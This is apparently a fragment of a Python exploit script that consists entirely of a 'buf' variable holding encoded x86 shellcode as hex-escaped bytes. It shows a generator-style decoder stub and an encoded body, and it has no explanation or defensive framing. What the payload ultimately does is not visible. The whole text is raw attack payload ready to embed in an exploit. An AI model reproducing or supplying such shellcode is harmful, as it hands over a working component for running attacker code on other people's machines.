buf =  ""
buf += "\xf8\xf5\x4a\x4a\x2f\xf8\x27\xf9\xda\xdb\xb8\x4b\x0c"
buf += "\x84\xd1\xd9\x74\x24\xf4\x5b\x33\xc9\xb1\x14\x83\xeb"
buf += "\xfc\x31\x43\x14\x03\x43\x5f\xee\x71\xe0\x84\xbd\x3a"
buf += "\x50\x50\x48\x34\xb7\xce\x2a\x1e\xf5\x8e\x25\x07\x6d"
buf += "\x8e\x49\x38\x6e\xe6\x49\x38\x6e\xe6\x21\x38\x6e\x06"
buf += "\xb2\x50\xc2\xab\xb2\xa2\x72\x93\xb3\xaf\x3a\x81\xd5"
buf += "\xc7\x3b\x9e\x7c\x70\x36\xe0\x09\x61\x2c\xfc\x58\x34"
buf += "\x38\x1d\x19\xfb\x50\xbb\xc6\x36\x24\xca\x04\x7e\x29"
buf += "\x7c\xe9\xb2\xb2\xf5\x31\xb3\x52"
